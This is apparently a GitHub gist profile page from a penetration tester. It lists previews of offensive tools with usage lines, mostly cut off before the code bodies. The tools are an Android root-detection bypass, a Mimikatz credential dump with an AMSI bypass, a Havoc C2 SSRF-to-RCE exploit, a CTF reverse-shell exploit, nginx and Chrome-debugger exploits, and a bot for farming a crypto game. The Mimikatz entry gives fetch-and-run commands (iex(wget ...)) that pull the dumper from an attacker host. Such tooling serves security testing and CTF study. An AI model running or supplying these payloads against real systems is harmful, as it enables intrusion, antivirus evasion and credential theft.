LongCat pich4ya

@pich4ya
pich4ya / proxychains-ng_m1.txt
Created March 6, 2023 03:25
Install proxychains-ng on macOS m1/m2 arm64e natively without Rosetta 2 (2023)
# @author Pichaya Morimoto (p.morimoto@sth.sh)
Problem:
```bash
brew install proxychains-ng
proxychains4 ncat 1.2.3.4 # not working
```
There are public workarounds like https://benobi.one/posts/running_brew_on_m1_for_x86/
@pich4ya
pich4ya / root_bypass.js
Created August 5, 2019 20:14
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (killed itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@pich4ya
pich4ya / Invoke-OneShot-Mimikatz.ps1
Last active February 3, 2025 16:46
Invoke-OneShot-Mimikatz.ps1 - One Shot for Mimikatz PowerShell Dump All Creds with AMSI Bypass 2022 Edition (Tested and worked on Windows 10 x64 patched 2022-03-26)
# TLDR:
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
#
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition
# (Tested and worked on Windows 10 x64 patched 2022-03-26)
#
# Usage:
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all)
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing)
@pich4ya
pich4ya / havoc_ssrf2rce.py
Last active January 21, 2025 15:49
The modified exploit code of SSRF (CVE-2024-41570) from @_chebuya and authN RCE from Laurence Tennant, Include Security
# Havoc C2 SSRF to AuthN RCE
# @author longcat (https://sth.sh)
#
# sudo ncat -lvp 443
# python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L
#
# The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE)
# Their writeups are great. I was so fascinated reading @_chebuya's blog post :)
# My work is just to integrate them into one single-shot exploit.
# In short, make WebSocket work with the Havoc C2 Agent Payload
@pich4ya
pich4ya / apk_getString_R_string.py
Last active January 19, 2025 15:28
This script can be used to replace strings.xml values in a target Java file
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# I tried all jadx options for deobf, but it did not work.
# This script can be used to replace strings.xml values in a target Java file
# if (!Intrinsics.areEqual(param, context.getString(R.string.m1))) { -> if (!Intrinsics.areEqual(param, "monday")) {
# Prompted and modified with ChatGPT for FlareOn 10's ItsOnFire
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources/com/secure/itsonfire/MessageWorker.java
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources
import xml.etree.ElementTree as ET
import re
import sys
@pich4ya
pich4ya / bookclub_exploit_rce.py
Last active December 29, 2024 07:42
Exploit for SEC Playground Bloody Xmas 2024 - Bookclub
#!/usr/bin/env python
# @author: longcat
# SEC Playground Bloody Xmas 2024 - Bookclub
# Exploit #2 - Read Flag w/ RCE (Reverse Shell)
import requests
import sys
import time
import argparse
import urllib3
@pich4ya
pich4ya / nginx_leak.py
Created May 9, 2018 08:51
Nginx - Remote Integer Overflow Vulnerability (Memory Leak, CVE-2017-7529)
#!/usr/bin/python
# -*- coding:utf-8 -*-
# https://github.com/nixawk/labs/issues/15
# Nginx - Remote Integer Overflow Vulnerability (Memory Leak)
# CVE-2017-7529
import requests
import logging
import sys
// Bot to farm TLM in the game Alien Worlds (the TLM can be exchanged for real money on Binance)
// For testing only, don't use it for real; the author takes no responsibility for any bugs whatsoever
//
// How to use:
// 1. Sign up + log in at https://play.alienworlds.io/
// 2. You must have mined manually at least once before
// 3. Copy this script and paste it into the Console (F12)
// There are probably bugs around rate limits and the like; some of the if/loop blocks can be removed
// I ran it for fun for 5 hours from a fresh user and got 8 TLM (depends on luck and other things too)
// If anyone has free time, rewriting it to hit the API directly instead of going through JS should be much more stable
@pich4ya
pich4ya / chrome_remote_debug_lfi.py
Created March 6, 2023 11:49
Chrome Debugger Local File Inclusion (No CVE, a security misconfiguration if the port is accessible for the attacker)
#!/usr/bin/env python
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb
# pip install requests websocket-client python-socks
# This exploit code can be used to read arbitrary files on the victim machine when
# chrome/chromium is started with --remote-debugging-port=9222, which is commonly done by test automation tooling during software testing
import requests
import json
import urllib3
import websocket
@pich4ya
pich4ya / magisk.txt
Last active October 11, 2024 00:49
Unlock bootloader / install TWRP / *root* with Magisk / install Magisk Manager on Google Pixel 1 using MacOS
@author LongCat (Pichaya Morimoto)
-- Unlock bootloader
Note: this will unlock bootloader & perform factory reset.
1. Prepare the device
Remove all screen unlock methods.
Enable Developer Mode: Settings > About phone > tap seven times on "Build number"
Enable USB Debugging: Settings > Developer options > Select "USB debugging"
Enable OEM Unlock: Settings > Developer options > Select "OEM unlocking"